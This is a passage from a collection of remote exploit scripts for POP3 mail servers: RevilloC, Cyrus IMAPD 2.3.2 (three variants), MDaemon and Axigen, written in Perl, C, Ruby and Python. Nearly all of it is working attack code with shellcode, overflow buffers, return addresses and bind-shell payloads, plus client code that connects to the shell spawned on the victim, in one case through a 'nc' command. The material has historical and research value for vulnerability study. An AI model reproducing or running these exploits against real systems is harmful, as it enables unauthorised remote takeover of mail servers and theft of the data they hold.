"\x74\xE0\x06\xC6\x86\x64\x60\xD9\x89\x88\x88\x01\x CE\x4E\xE0\xBB".
"\xBA\x88\x88\xE0\xFF\xFB\xBA\xD7\xDC\x77\xDE\x4E\x 01\xCE\x70\x77".
"\xFE\x74\xE0\x25\x51\x8D\x46\x60\xB8\x89\x88\x88\x 01\xCE\x5A\x77".
"\xFE\x74\xE0\xFA\x76\x3B\x9E\x60\xA8\x89\x88\x88\x 01\xCE\x46\x77".
"\xFE\x74\xE0\x67\x46\x68\xE8\x60\x98\x89\x88\x88\x 01\xCE\x42\x77".
"\xFE\x70\xE0\x43\x65\x74\xB3\x60\x88\x89\x88\x88\x 01\xCE\x7C\x77".
"\xFE\x70\xE0\x51\x81\x7D\x25\x60\x78\x88\x88\x88\x 01\xCE\x78\x77".
"\xFE\x70\xE0\x2C\x92\xF8\x4F\x60\x68\x88\x88\x88\x 01\xCE\x64\x77".
"\xFE\x70\xE0\x2C\x25\xA6\x61\x60\x58\x88\x88\x88\x 01\xCE\x60\x77".
"\xFE\x70\xE0\x6D\xC1\x0E\xC1\x60\x48\x88\x88\x88\x 01\xCE\x6A\x77".
"\xFE\x70\xE0\x6F\xF1\x4E\xF1\x60\x38\x88\x88\x88\x 01\xCE\x5E\xBB".
"\x77\x09\x64\x7C\x89\x88\x88\xDC\xE0\x89\x89\x88\x 88\x77\xDE\x7C".
"\xD8\xD8\xD8\xD8\xC8\xD8\xC8\xD8\x77\xDE\x78\x03\x 50\xDF\xDF\xE0".
"\x8A\x88\xAB\x6F\x03\x44\xE2\x9E\xD9\xDB\x77\xDE\x 64\xDF\xDB\x77".
"\xDE\x60\xBB\x77\xDF\xD9\xDB\x77\xDE\x6A\x03\x58\x 01\xCE\x36\xE0".
"\xEB\xE5\xEC\x88\x01\xEE\x4A\x0B\x4C\x24\x05\xB4\x AC\xBB\x48\xBB".
"\x41\x08\x49\x9D\x23\x6A\x75\x4E\xCC\xAC\x98\xCC\x 76\xCC\xAC\xB5".
"\x01\xDC\xAC\xC0\x01\xDC\xAC\xC4\x01\xDC\xAC\xD8\x 05\xCC\xAC\x98".
"\xDC\xD8\xD9\xD9\xD9\xC9\xD9\xC1\xD9\xD9\x77\xFE\x 4A\xD9\x77\xDE".
"\x46\x03\x44\xE2\x77\x77\xB9\x77\xDE\x5A\x03\x40\x 77\xFE\x36\x77".
"\xDE\x5E\x63\x16\x77\xDE\x9C\xDE\xEC\x29\xB8\x88\x 88\x88\x03\xC8".
"\x84\x03\xF8\x94\x25\x03\xC8\x80\xD6\x4A\x8C\x88\x DB\xDD\xDE\xDF".
"\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D\xF0\x8B\x 5D\x03\xC2\x90".
"\x03\xD2\xA8\x8B\x55\x6B\xBA\xC1\x03\xBC\x03\x8B\x 7D\xBB\x77\x74".
"\xBB\x48\x24\xB2\x4C\xFC\x8F\x49\x47\x85\x8B\x70\x 63\x7A\xB3\xF4".
"\xAC\x9C\xFD\x69\x03\xD2\xAC\x8B\x55\xEE\x03\x84\x C3\x03\xD2\x94".
"\x8B\x55\x03\x8C\x03\x8B\x4D\x63\x8A\xBB\x48\x03\x 5D\xD7\xD6\xD5".
"\xD3\x4A\x8C\x88";
$buffer = "\x90"x3601;
$eax ="\x83\xb5\x19\x01"; # change if needed
$peb= "\x20\xf0\xfd\x7f"; #PEB lock
$user ="USER ";
$enter = "\x0d\x0a";
$connect = IO::Socket::INET ->new (Proto=>"tcp",
PeerAddr=> "$ARGV[0]",
PeerPort=>"110"); unless ($connect) { die "cant connect" }
print "\nRevilloC mail server remote PoC exploit by securma massine\n";
print "\nsecurma\@morx.org\n";
print "\n+++++++++++www.morx.org++++++++++++++++\n";
$connect->recv($text,128);
print "$text\n";
print "[+] Sent USER\n";
$connect->send($user . $buffer . $shellcode . $eax . $peb . $enter);
print "[+] Sent shellcode..telnet to victim host port 9191\n";
# [2006-03-07]
110 Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit
/* zeroday warez
* !!! PRIVATE - DONT DISTRIBUTE - PRIVATE !!!
*********************************************
* cyruspop3d.c - cyrus pop3d remote exploit by kcope
* tested on cyrus-imapd-2.3.2,linux
*
* bug found 23 Apr 2006 by kcope
*--------------------------------------------
*
* imapd/pop3d.c line 1830 :
* char userbuf[MAX_MAILBOX_NAME+1], *p;
* ...
* if (!ulen) ulen = strlen(user);
* if (config_getswitch(IMAPOPT_POPSUBFOLDERS)) {
* memcpy(userbuf, user, ulen);
* userbuf[ulen] = '\0';
* ...
* popsubfolders has to be enabled
*
* thnx to blackzero revoguard wY! qobaiashi bogus alex
* Love to Lisa :-)
*********************************************
* !!! PRIVATE - DONT DISTRIBUTE - PRIVATE !!!
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/time.h>
#include <unistd.h>
#include <netdb.h>
#include <errno.h>
#define POP3PORT 110
#define BINDPORT 13370
unsigned char shellcode[] =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\x e1\xcd\x80\x96"
"\x43\x52\x66\x68\x34\x3a\x66\x53\x89\xe1\x6a\x66\x 58\x50\x51\x56"
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x 56\x43\x89\xe1"
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x 49\x79\xf9\xb0"
"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x 89\xe3\x52\x53"
"\x89\xe1\xcd\x80";
int do_connect (char *remotehost, int port)
{
static struct hostent *host;
static struct sockaddr_in addr;
static int done=0;
int s;
if (!inet_aton(remotehost, &addr.sin_addr) && (done != 1))
{
host = gethostbyname(remotehost);
if (!host)
{
perror("gethostbyname() failed");
return -1;
}
addr.sin_addr = *(struct in_addr*)host->h_addr;
}
s = socket(PF_INET, SOCK_STREAM, 0);
if (s == -1)
{
close(s);
perror("socket() failed");
return -1;
}
addr.sin_port = htons(port);
addr.sin_family = AF_INET;
if (connect(s, (struct sockaddr*)&addr, sizeof(addr)) == -1)
{
close(s);
if (port == POP3PORT) perror("connect() failed");
return -1;
}
done=1;
return s;
}
void do_exploit(int sock, unsigned int returnaddr)
{
char nops[360];
char nops2[100];
char exploitbuffer[1024];
char recvbuf[30];
memset(&nops[0], '\0', sizeof(nops));
memset(&nops[0], 'A', 352);
memset(&nops2[0], '\0', sizeof(nops2));
memset(&nops2[0], 'A', 90);
while (1) {
recv(sock, recvbuf, 1, 0);
if ((recvbuf[0] == '\r') || (recvbuf[0] == '\n')) break;
}
sprintf(exploitbuffer, "USER %s%s%s\r\n", nops, shellcode, nops2);
exploitbuffer[strlen(exploitbuffer)-1] = (returnaddr >> 24) & 0xff;
exploitbuffer[strlen(exploitbuffer)-2] = (returnaddr >> 16) & 0xff;
exploitbuffer[strlen(exploitbuffer)-3] = (returnaddr >> 8) & 0xff;
exploitbuffer[strlen(exploitbuffer)-4] = (returnaddr) & 0xff;
send(sock, exploitbuffer, strlen(exploitbuffer), 0);
recv(sock, recvbuf, sizeof(recvbuf)-1, 0);
}
int do_checkvulnerable(int sock) {
char checkbuffer[1024];
char recvbuffer[10];
memset(&checkbuffer[0], '\0', sizeof(checkbuffer)-1);
memset(&checkbuffer[0], 'A', sizeof(checkbuffer)-2);
checkbuffer[0]='U';
checkbuffer[1]='S';
checkbuffer[2]='E';
checkbuffer[3]='R';
checkbuffer[4]=' ';
checkbuffer[sizeof(checkbuffer)-3]='\r';
checkbuffer[sizeof(checkbuffer)-2]='\n';
while (1) {
recv(sock, recvbuffer, 1, 0);
if ((recvbuffer[0] == '\r') || (recvbuffer[0] == '\n')) break;
}
send(sock, checkbuffer, strlen(checkbuffer), 0);
if (recv(sock, recvbuffer, sizeof(recvbuffer)-1, MSG_WAITALL) < 3)
return 0;
return -1;
}
int do_remote_shell(int sockfd)
{
while(1)
{
fd_set fds;
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sockfd,&fds);
if(select(FD_SETSIZE,&fds,NULL,NULL,NULL))
{
int cnt;
char buf[1024];
if(FD_ISSET(0,&fds))
{
if((cnt=read(0,buf,1024))<1)
{
if(errno==EWOULDBLOCK||errno==EAGAIN)
continue;
else
break;
}
write(sockfd,buf,cnt);
}
if(FD_ISSET(sockfd,&fds))
{
if((cnt=read(sockfd,buf,1024))<1)
{
if(errno==EWOULDBLOCK||errno==EAGAIN)
continue;
else
break;
}
write(1,buf,cnt);
}
}
}
}
int main(int argc, char **argv)
{
char remotehost[255];
int s,s2,i;
unsigned int returnaddr;
printf("cyrus pop3d remote exploit [kcope/2006]\n");
if (argc < 3) {
printf("usage: %s <remote host> <brute force start return address>\n", argv[0]);
printf("eg: %s localhost bfffa000\n", argv[0]);
return 1;
}
strcpy(remotehost, argv[1]); //uhoho
if (sscanf(argv[2], "%8x", &returnaddr) == 0) {
printf("Specify valid start return address\n");
return 1;
}
printf("Checking if vulnerable... ");
s=do_connect(remotehost, POP3PORT);
if (do_checkvulnerable(s) == -1) {
close(s);
printf("\ncyrus pop3d seems not to be vulnerable\nno popsubfolders defined at remote host?\n");
return 1;
}
close(s);
printf("SUCCESS!\n");
while (returnaddr < 0xbfffffff) {
returnaddr+=16;
printf("CRACKADDR = %4x\n", returnaddr);
fflush(stdout);
s=do_connect(remotehost, POP3PORT);
if (s==-1)
return 1;
do_exploit(s, returnaddr);
for (i=0;i<2;i++) {
if ((s2=do_connect(remotehost, BINDPORT)) != -1) {
printf("\nALEX,ALEX WE GOT IT!!!\n");
do_remote_shell(s2);
return 0;
}
close(s2);
}
close(s);
}
return 0;
}
// [2006-05-21]
110 Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (2)
#!/usr/bin/ruby
#
# cyrus-imapd pop3d exploit
# by bannedit
#
# 05/23/2006
# This exploit takes advantage of a stack based overflow.
# Once the stack corruption has occured it is possible
# to overwrite a pointer which is later used for a memcpy
# this gives us a write anything anywhere condition similar
# to a format string vulnerability.
#
# I choose to overwrite the GOT table with my shellcode and
# return to it. This defeats the VA random patch and possibly
# other stack protection features.
#
# tested on gentoo-sources linux 2.6.16
require 'socket'
#will add targets for other linux distros
targets = { 'linux 2.6' => '0x080fd318', 'linux 2.6 Hardened' => '', 'freebsd' => '' }
#metasploit bind shellcode by skape 84 bytes port 4444#
shellcode =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\x e1\xcd\x80\x96"+
"\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x 58\x50\x51\x56"+
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x 56\x43\x89\xe1"+
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x 49\x79\xf9\xb0"+
"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x 89\xe3\x52\x53"+
"\x89\xe1\xcd\x80"
puts "--[cyrus imapd pop3 popsubfolders exploit"
puts "----[by bannedit"
puts "-----------------------------------------"
case ARGV.length
when 0
puts "--- ./exploit [host] [options]"
exit
when 1
sock = TCPSocket.new(ARGV[0], "pop3")
when 2
sock = TCPSocket.new(ARGV[0], "pop3")
ret = ARGV[1].hex
end
ret = (targets['linux 2.6'].hex)
puts "<- " + banner = sock.gets
puts "-> sending USER command"
printf " injecting shellcode: %d bytes\n", shellcode.length
#this alignment stuff should probably be cleaned up its kinda icky#
evil_buff = "USER "
evil_buff <<"\x90" * 265 #(290 - shellcode.length)
evil_buff << ([ret].pack('V')) * 2 #return address
evil_buff <<"\x90" * (250 - shellcode.length)
evil_buff << shellcode
evil_buff <<"\x90" * (29)
ret = ret - 277
evil_buff << ([ret].pack('V')) * 4 #0x080fd204
evil_buff <<"\r\n"
sock.send(evil_buff, 0)
sleep 9
puts " attempting to connect to #{ARGV[0]} port 4444"
cmd = "nc #{ARGV[0]} 4444"
system(cmd)
sock.close
# [2006-07-21]
110 Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (3)
#!/usr/bin/perl
## Creator: K-sPecial (xzziroz.net) of .aware (awarenetwork.org)
## Name: bid-18056.pl
## Date: 08/12/2006
##
## Description: this is yet another exploit for the cyrus pop3d buffer overflow. I tried both public
## exploits and not either of them worked (not that they don't but coding my own is generaly faster
## and easier) so I coded my own. The exploit by kcope seems to be done right and maybe i just got realy
## unlucky and missed the offset in between the 5 runs i gave it. The one from bannedit was interesting...
## realy nice idea about overwriting the pointer and sticking your shellcode in GOT. Only problem is that
## when i was writing this exploit with the same method, and i placed my shellcode in GOT, functions before
## the return from the vuln function where segfaulting first by trying to actualy *use* the GOT! So what I have
## done here is used the same method, yet found a data area that is not going to freak pop3d
## out before it gets to the return. Specificy I use part of the .data segment (or was it .bss, anyways) labeled
## 'buf'. With this the same one-offset-per-machine is gained that bannedit was achieving.
##
## Other: Basicly what all this means, is you just have to give an offset that is a location in memory that
## is writeable and executable (anything in .data, .bss, .stack, .heap, etc) and make sure it's not something
## that will need to be used by functions in pop3d before popd_canon_user() returns and hence executes your
## shellcode (because it'll segfault and won't get executed).
##
## Note: bindport is 13370
################################################## ################################################## #############
use IO::Socket;
use strict;
my $host = $ARGV[0] || help();
my $offset = $ARGV[1] || help();
my $port = 110;
# stollen from cyruspop3d.c because this actualy worked, i couldn't get any
# metasploit sc to work (as usualy, hmph)
my $shellcode =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\x e1\xcd\x80\x96".
"\x43\x52\x66\x68\x34\x3a\x66\x53\x89\xe1\x6a\x66\x 58\x50\x51\x56".
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x 56\x43\x89\xe1".
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x 49\x79\xf9\xb0".
"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x 89\xe3\x52\x53".
"\x89\xe1\xcd\x80";
my $sock = IO::Socket::INET->new('PeerAddr' => $host,
'PeerPort' => $port) or die ("-!> unable to connect to '$host:$port': $!\n");
$sock->autoflush();
print $sock "USER "; ## begin USER command with just that
print $sock "$shellcode"; ## shellcode is *userbuf is *user
print $sock pack('l', hex($offset)) x 120; ## location overwrites EIP and *out, userbuf/user written to *out
print $sock "\n"; ## that simple
sub help {
print "bid-18056.pl by K-sPecial (xzziroz.net) of .aware (awarenetwork.org)\n";
print "08/12/2006\n\n";
print "perl $0 \$host \$offset\n\n";
print "Offsets: \n";
print "0x8106c20 (debian 3.1 - 2.6.16-rc6)\n";
exit(0);
}
# [2006-08-14]
110 MDaemon POP3 Server < 9.06 (USER) Remote Heap Overflow Exploit
#!/usr/bin/python
import sys
import struct
import socket
from time import sleep
################################################## ######################################
# MDaemon Pre Authentication (USER) Heap Overflow
# Code based on Leon Juranic's exploit
# Coded by muts - [email protected]
# http://www.hackingdefined.com
# http://www.remote-exploit.org
# Tested on:
# Mdaemon 9.0.5
# Mdaemon 7.2.3
# Mdaemon 7.2.2
# Mdaemon 7.2.1
# Mdaemon 7.2.0
# Possibly Others
# PLEASE CONTINUE READING !
# Huge greets to xbxice and talz for leading me away from the darkness
################################################## ######################################
# Mdaemon is wierd. It seems like their developers decided to annoy everyone
# by making their software do unexpected things.
# The exploit overwrites UnhandledExceptionFilter, and jumps to an egghunter
# shellcode - which then scans the memory, and executes a bindshell on port 4444.
#
# On some Win2k SP4 machines, I found SetUnhandledExceptionFilter at 0x00000214,
# for which I unfortunately had no explenation.
# I later found out that these machines were fully patched ...
# After inspecting kernel32.dll from my SP4 (not fully patched) and comparing it to
# todays' version, I noticed that the SetunhandledExceptionFilter function had changed,
# and looks suspiciously similar to XP SP2...
# Note that my unpatched win2k was last patched 2-3 weeks ago,
# so I suspect this change is recent.
# The end of easy UnhandledExceptionFilter exploitation on Win2k ?
#
# So, this is a partially working exploit, on unpatched win2k boxes....
# Kiddies, treat this exploit as DOS :)
#
# I got 3 types of results with this code:
#
# 1. Shell :)
# 2. Mdaemon process shoots up to 100%, scanning memory for shellcode that isn't there.
# 3. Plain ugly crash - oh well.
#
# At minimum, I'de check the UnhandledExceptionFilter address before running the exploit.
################################################## ######################################
#
# C:\Documents and Settings\muts>nc -v 192.168.220.128 4444
# 97DACBEC7CA4483 [192.168.220.128] 4444 (?) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\MDaemon\APP>
################################################## ######################################
host="192.168.220.128"
ret = struct.pack("<L",0x7c2f62b6) # 7c2f62b6 advapi.dll JMP ESI+48 SP4 No Patches
ueh = struct.pack("<L",0x7C54144C) # SetUnhandledExceptionFilter 0x7C54144C win2k SP4 No Patches
tap = struct.pack("<L",0xeb169090) # Short Jump over some garbage
# skape's egghunter shellcode
egghunter ="\xeb\x21\x59\xb8\x74\x30\x30\x77\x51\x6a\xff\x33\x db\x64\x89\x23"
egghunter +="\x6a\x02\x59\x8b\xfb\xf3\xaf\x75\x07\xff\xe7\x66\x 81\xcb\xff\x0f"
egghunter +="\x43\xeb\xed\xe8\xda\xff\xff\xff\x6a\x0c\x59\x8b\x 04\x0c\xb1\xb8"
egghunter +="\x83\x04\x08\x06\x58\x83\xc4\x10\x50\x33\xc0\xc3"
# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum
shellcode ="\x90\x90\x74\x30\x30\x77\x74\x30\x30\x77" # t00wt00w (!)
shellcode +="\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x 49\x49\x49\x49"
shellcode +="\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x 41\x30\x42\x36"
shellcode +="\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x 44\x42\x48\x34"
shellcode +="\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x 30\x41\x44\x41"
shellcode +="\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x 4c\x56\x4b\x4e"
shellcode +="\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x 42\x36\x4b\x38"
shellcode +="\x4e\x46\x46\x52\x46\x42\x4b\x48\x45\x34\x4e\x53\x 4b\x48\x4e\x57"
shellcode +="\x45\x50\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x 4a\x41\x4b\x48"
shellcode +="\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x34\x4b\x58\x 46\x33\x4b\x48"
shellcode +="\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x 46\x38\x42\x4c"
shellcode +="\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x 44\x4c\x4b\x4e"
shellcode +="\x46\x4f\x4b\x53\x46\x45\x46\x32\x4a\x52\x45\x37\x 45\x4e\x4b\x38"
shellcode +="\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x36\x4b\x58\x 4e\x30\x4b\x54"
shellcode +="\x4b\x58\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x43\x50\x 4e\x42\x4b\x38"
shellcode +="\x49\x58\x4e\x46\x46\x52\x4e\x31\x41\x46\x43\x4c\x 41\x53\x4b\x4d"
shellcode +="\x46\x56\x4b\x58\x43\x44\x42\x33\x4b\x48\x42\x54\x 4e\x30\x4b\x38"
shellcode +="\x42\x57\x4e\x51\x4d\x4a\x4b\x58\x42\x54\x4a\x50\x 50\x45\x4a\x46"
shellcode +="\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x 48\x4d\x48\x56"
shellcode +="\x43\x35\x48\x46\x4a\x56\x43\x43\x44\x43\x4a\x36\x 47\x47\x43\x57"
shellcode +="\x44\x33\x4f\x45\x46\x45\x4f\x4f\x42\x4d\x4a\x46\x 4b\x4c\x4d\x4e"
shellcode +="\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x 49\x38\x45\x4e"
shellcode +="\x48\x36\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x55\x 4c\x36\x44\x50"
shellcode +="\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x 4d\x4a\x47\x55"
shellcode +="\x4f\x4f\x48\x4d\x43\x45\x43\x55\x43\x45\x43\x35\x 43\x55\x43\x34"
shellcode +="\x43\x45\x43\x44\x43\x45\x4f\x4f\x42\x4d\x48\x36\x 4a\x56\x41\x51"
shellcode +="\x4e\x35\x48\x46\x43\x35\x49\x38\x41\x4e\x45\x39\x 4a\x46\x46\x4a"
shellcode +="\x4c\x51\x42\x37\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x 4c\x36\x42\x51"
shellcode +="\x41\x35\x45\x55\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x 4d\x4a\x50\x42"
shellcode +="\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x55\x 4f\x4f\x42\x4d"
shellcode +="\x4a\x46\x45\x4e\x49\x44\x48\x48\x49\x34\x47\x55\x 4f\x4f\x48\x4d"
shellcode +="\x42\x35\x46\x35\x46\x35\x45\x45\x4f\x4f\x42\x4d\x 43\x49\x4a\x56"
shellcode +="\x47\x4e\x49\x57\x48\x4c\x49\x47\x47\x55\x4f\x4f\x 48\x4d\x45\x45"
shellcode +="\x4f\x4f\x42\x4d\x48\x56\x4c\x56\x46\x56\x48\x56\x 4a\x46\x43\x46"
shellcode +="\x4d\x46\x49\x38\x45\x4e\x4c\x46\x42\x55\x49\x55\x 49\x32\x4e\x4c"
shellcode +="\x49\x38\x47\x4e\x4c\x36\x46\x34\x49\x58\x44\x4e\x 41\x33\x42\x4c"
shellcode +="\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x52\x50\x4f\x 44\x34\x4e\x42"
shellcode +="\x43\x59\x4d\x58\x4c\x57\x4a\x53\x4b\x4a\x4b\x4a\x 4b\x4a\x4a\x56"
shellcode +="\x44\x37\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x47\x 46\x44\x4f\x4f"
shellcode +="\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x55\x41\x55\x 41\x55\x4c\x56"
shellcode +="\x41\x50\x41\x45\x41\x35\x45\x45\x41\x55\x4f\x4f\x 42\x4d\x4a\x56"
shellcode +="\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x45\x4f\x4f\x 48\x4d\x4c\x46"
shellcode +="\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x58\x 47\x55\x4e\x4f"
shellcode +="\x43\x38\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x35\x 4f\x4f\x42\x4d"
shellcode +="\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x35\x43\x55\x 4f\x4f\x48\x4d"
shellcode +="\x4f\x4f\x42\x4d\x5a"
buffer ="AAA"+tap+"BBBB"+ret+ueh+"\x90"*90 +egghunter+"C"*346
for x in range(5):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,110))
data=s.recv(1024)
print data
s.send('USER '+'@A' * 1600 + '\x90'*5945 + shellcode +'D'*3711 + '\r\n')
s.send('QUIT\r\n')
s.close()
sleep(1)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,110))
data=s.recv(1024)
print data
s.send('USER ' + '@A@A'+ buffer + '\r\n')
data=s.recv(1024)
print data
s.send('USER ' + 'A' * 3370 + '\r\n')
s.close()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,110))
data=s.recv(1024)
print data
s.send('USER ' + '@A@A'+ buffer + '\r\n')
data=s.recv(1024)
print data
s.send('USER ' + 'A' * 3370 + '\r\n')
s.close()
sleep(1)
# [2006-08-26]
110 Axigen eMail Server 2.0.0b2 (pop3) Remote Format String Exploit
/* axiagen.c
*
* Axigen eMail Server v2.0 (beta)
* by fuGich Tue Dec 5 2006
*
* thanks to mu-b
*
* - Tested on: Axigen V2 (beta)
*
* logType for the pop3 service must be "system" and
* the logLevel set to any number with 4th bit set
*
* remote shell format string vulnerability in pop3
* /bin/sh to bind to port 31337
*
* optimised format string generated with libforSC
* used hhn for writes, could have been hn's but this was small enough and reduces size of log entry generated
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#define DEF_PORT 110
#define PORT_POP3 DEF_PORT
char formatString[] =
// plt fixup code
"\xba\xd8\xbe\x85\x09" // mov $0x985bed8,%edx
"\xc7\x02\x9a\xf0\x04\x08" // movl $0x804f09a,(%edx)
"\x8d\x52\x04" // lea 0x4(%edx),%edx
"\xc6\x02\xaa" // movb $0xaa,(%edx)
"\x90\x90\x90" // make divisible by 8
//
// bind shell with fork to port 31337 98 bytes
//
"\x6a\x66" // push $0x66
"\x58" // pop %eax
"\x99" // cltd
"\x6a\x01" // push $0x1
"\x5b" // pop %ebx
"\x52" // push %edx
"\x53" // push %ebx
"\x6a\x02" // push $0x2
//
// <_doint>:
//
"\x89\xe1" // mov %esp,%ecx
"\xcd\x80" // int $0x80
"\x5b" // pop %ebx
"\x5d" // pop %ebp
"\x52" // push %edx
"\x66\xbd\x69\x7a" // mov $0x7a69,%bp (0x7a69 = 31337)
"\x0f\xcd" // bswap %ebp
"\x09\xdd" // or %ebx,%ebp
"\x55" // push %ebp
"\x6a\x10" // push $0x10
"\x51" // push %ecx
"\x50" // push %eax
"\x89\xe1" // mov %esp,%ecx
"\xb0\x66" // mov $0x66,%al
"\xcd\x80" // int $0x80
"\xb3\x04" // mov $0x4,%bl
"\xb0\x66" // mov $0x66,%al
"\xcd\x80" // int $0x80
//
// <_acceptloop>:
//
"\x5f" // pop %edi
"\x50" // push %eax
"\x50" // push %eax
"\x57" // push %edi
"\x89\xe1" // mov %esp,%ecx
"\x43" // inc %ebx
"\xb0\x66" // mov $0x66,%al
"\xcd\x80" // int $0x80
"\x93" // xchg %eax,%ebx
"\xb0\x02" // mov $0x2,%al
"\xcd\x80" // int $0x80
"\x85\xc0" // test %eax,%eax
"\x75\x1a" // jne <_parent>
"\x59" // pop %ecx
//
// <_dup2loop>:
//
"\xb0\x3f" // mov $0x3f,%al
"\xcd\x80" // int $0x80
"\x49" // dec %ecx
"\x79\xf9" // jns <_dup2loop>
"\xb0\x0b" // mov $0xb,%al
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp,%ebx
"\x52" // push %edx
"\x53" // push %ebx
"\xeb\xb2" // jmp <_doint>
//
// <_parent>:
//
"\x6a\x06" // push $0x6
"\x58" // pop %eax
"\xcd\x80" // int $0x80
"\xb3\x04" // mov $0x4,%bl
"\xeb\xc9" // jmp <_acceptloop>
//
// 9 write addresses
//
"\xd8\xbe\x85\x09" // pointer @ 0x0985bed8
"\xd9\xbe\x85\x09"
"\xda\xbe\x85\x09"
"\xdb\xbe\x85\x09"
"\xe0\xbe\x85\x09" // place shell code @ 0x0985bee0
"\xe1\xbe\x85\x09"
"\xe2\xbe\x85\x09"
"\xe3\xbe\x85\x09"
"\xe4\xbe\x85\x09"
// add the format string
"%18u%66$n%34u%65$hhn%31u%72$hhn%10u%68$hhn%31u%71$ hhn%87u%70$hhn%14u%69$hhn%90u%73$hhn%158u%67$hhn\r \n";
static int sock_send (int sock, u_char * src, int len);
static void formatme (u_char * host);
static int sockami (u_char * host, int port);
void shell (int sock);
void shell (int sock){ /* Attach to Remote Shell */
int l;
char buf[512];
fd_set rfds;
while (1) {
FD_SET (0, &rfds);
FD_SET (sock, &rfds);
select (sock + 1, &rfds, NULL, NULL, NULL);
if (FD_ISSET (0, &rfds)) {
l = read (0, buf, sizeof (buf));
if (l <= 0) {
printf("\n - Connection closed by local user\n");
exit (EXIT_FAILURE);
}
write (sock, buf, l);
}
if (FD_ISSET (sock, &rfds)) {
l = read (sock, buf, sizeof (buf));
if (l == 0) {
printf ("\n - Connection closed by remote host.\n");
exit (EXIT_FAILURE);
} else if (l < 0) {
printf ("\n - Read failure\n");
exit (EXIT_FAILURE);
}
write (1, buf, l);
}
}
}
static int sock_send (int sock, u_char * src, int len){ /* send data to the open socket */
int sbytes;
sbytes = send (sock, src, len, 0);
return (sbytes);
}
static int sockami (u_char * host, int port){ /* create the socket */
struct sockaddr_in address;
struct hostent *hp;
int sock;
fflush (stdout);
if ((sock = socket (AF_INET, SOCK_STREAM, 0)) == -1){
perror ("socket()");
exit (-1);
}
if ((hp = gethostbyname (host)) == NULL){
perror ("gethostbyname()");
exit (-1);
}
memset (&address, 0, sizeof (address));
memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length);
address.sin_family = AF_INET;
address.sin_port = htons (port);
if (connect (sock, (struct sockaddr *) &address, sizeof (address)) == -1){
perror ("connect()");
exit (EXIT_FAILURE);
}
return (sock);
}
static void formatme (u_char * host){ /* do the evil */
int sock;
printf ("+Connecting to %s:%d ", host, PORT_POP3);
sock = sockami (host, PORT_POP3);
printf ("\n+Sending format string\n");
sock_send (sock, formatString, strlen (formatString));
fflush (stdout);
sleep(2);
printf ("+Connecting to Shell ");
sock = sockami (host, 31337);
printf ("- Done\n");
shell(sock);
}
int main (int argc, char **argv){ /* go figure */
printf ("Axigen 2.0 beta Remote pop3 exploit\n"
"by: <[email protected]>\n\n");
if (argc <= 1)
{
